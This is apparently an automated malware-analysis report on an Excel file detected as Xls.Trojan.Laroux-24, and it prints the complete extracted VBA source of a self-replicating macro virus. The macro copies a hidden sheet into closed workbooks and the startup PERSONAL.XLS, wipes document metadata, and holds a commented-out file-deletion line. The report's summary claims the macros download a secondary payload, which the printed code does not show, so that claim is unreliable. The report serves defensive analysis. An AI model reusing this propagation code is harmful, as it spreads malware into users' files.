MALICIOUS
Risk Score: 220
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-24. It contains VBA macros, including Auto_Open and Auto_Close, which are commonly used to execute malicious code upon document interaction. The macros appear to be designed to download and execute a secondary payload, although the exact mechanism is obfuscated and truncated in the provided script.
Heuristics (4)
- ClamAV: Xls.Trojan.Laroux-24 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Laroux-24
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7684 bytes |

SHA-256: f9db0067575db8af01c3849ad5021ec0468cd844d43e982c41124611b981cf14
Detection: ClamAV: Xls.Trojan.Laroux-24
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "JUNGLE_AI"
'
Sub auto_open()
Attribute auto_open.VB_Description = "Macro recorded 09/02/1999 by pkgaim"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n0"
I = Date
P$ = Str(I)
P1$ = Left(P$, 2)
If P1$ = "25" Then
'Kill "J*.*"
Else
End If
T = TimeValue(Time)
X$ = Str(T)
M$ = Left(X$, 2)
If M$ = "18" Or M$ = "6:" Or M$ = "06" Then
MsgBox ("VIRUS JUNGLE_AI")
Else
End If
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
H$ = ActiveWorkbook.Name
P$ = ActiveWorkbook.Path
S$ = Workbooks(H$).Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
Workbooks("PERSONAL.XLS").Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks(H$).Sheets(1)
Workbooks(H$).Sheets("JUNGLE_AI").Visible = False
Else
ST$ = Application.StartupPath
PE$ = Dir(ST$ & "\" & "PERSONAL.XLS")
If PE$ = "PERSONAL.XLS" Then
C = 1
Else
C = 0
End If
Application.ScreenUpdating = False
If C = 1 Then
N$ = ActiveWorkbook.Name
S$ = Workbooks("PERSONAL.XLS").Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
'SAVE AS------
Windows("PERSONAL.XLS").Visible = True
Workbooks(N$).Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks("PERSONAL.XLS").Sheets(1)
Windows("PERSONAL.XLS").Visible = False
'--------------
Else
End If
Else
'SAVE AS NEW------
Application.ScreenUpdating = False
N$ = ActiveWorkbook.Name
Sheets("JUNGLE_AI").Visible = True
Sheets("JUNGLE_AI").Select
CUR$ = CurDir()
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
N1$ = ActiveWorkbook.Name
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(N1$).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS", FileFormat:=xlNormal, _
Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
, CreateBackup:=False
ChDir CUR$
'--------------
End If
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "PERSONAL.XLS!JUNGLE_AI"
End Sub
' Processing file: /opt/analyzer/scan_staging/c037ec41e66c474aae12f6bee6d7ba3c.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/JUNGLE_AI - 5683 bytes
... (truncated)